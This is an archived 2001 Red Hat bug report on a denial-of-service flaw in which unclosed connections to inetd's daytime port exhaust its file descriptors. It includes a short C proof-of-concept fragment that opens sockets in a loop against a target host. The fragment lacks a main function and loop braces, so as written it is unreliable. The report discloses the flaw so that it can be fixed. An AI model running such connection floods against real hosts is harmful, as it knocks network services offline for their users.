Bug 26899 - daytime (and other services) will kill inetd if connecting socket does not close
Summary: daytime (and other services) will kill inetd if connecting socket does not close
Status: CLOSED DUPLICATE of bug 16729
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: inetd
Version: 7.0
Hardware: i386
OS: Linux
Target Milestone: ---
Assignee: Trond Eivind Glomsrxd
QA Contact:
Keywords: Security
Depends On:
TreeView+ depends on / blocked
Reported: 2001-02-10 00:31 UTC by David Morgan
Modified: 2008-05-01 15:37 UTC (History)
0 users

Clone Of:
Last Closed: 2001-02-10 14:12:23 UTC

Attachments (Terms of Use)

Description David Morgan 2001-02-10 00:31:42 UTC
From Bugzilla Helper:
User-Agent: Mozilla/4.7 [en] (WinNT; I)

Using a simple program that loops and does a connect() call to a port under inetd's control without a close()
will make inetd stop responding saying Too many open files

Reproducible: Always
Steps to Reproduce:
Compile the following program after changing SOMEHOSTNAME

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

        int i,s;
        struct sockaddr_in sin;
        struct hostent *hent;

        memset(&sin, 0, sizeof sin);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(13); 

        hent = gethostbyname("SOMEHOSTNAME");
        memcpy(&sin.sin_addr, hent->h_addr, hent->h_length);
        for (i = 0; i < 1000; i++)
                printf("%d\n", i);
                s = socket(AF_INET, SOCK_STREAM, 0);
                connect (s, &sin, sizeof sin);

Change the entry in the inetd.conf so the nowait is set to nowait.1000

Actual Results:  In the log messages will appear:

inetd[XXX]: accept (for daytime): Too many files open

Expected Results:  Inetd should not fill up its table and stop network services running.  This may be a limitation in TCP/IP but I
am not sure

This causes a denial of service attack on RedHat boxes running inetd and xinetd.

Comment 1 Trond Eivind Glomsrxd 2001-02-10 22:16:50 UTC
This was resolved with an errata some time ago.

*** This bug has been marked as a duplicate of 16729 ***

Note You need to log in before you can comment on or make changes to this bug.